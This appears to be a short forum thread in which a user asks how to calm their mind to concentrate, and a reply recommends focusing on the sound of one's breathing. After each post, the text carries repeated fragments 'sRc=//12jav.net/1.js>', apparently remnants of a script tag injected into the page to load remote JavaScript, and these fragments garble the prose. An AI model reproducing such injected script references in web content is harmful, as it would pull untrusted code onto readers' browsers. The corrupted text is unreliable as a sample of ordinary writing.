i need to learn to empty my mind so i can concentrate better, i dont want to empty my mind so that im basicallly brain dead i mean calm my self down sorta thing and have absoulutly no thoughts in ym head apart from what im focusing on any ideas? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

everyone has there own way to clear there mind... and there way may not help you. so if i where you i well try different ways and see if they work...

The way that I have the best results with is to concentrate on the sound of my breathing; the sound of the breath coming in and going out. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
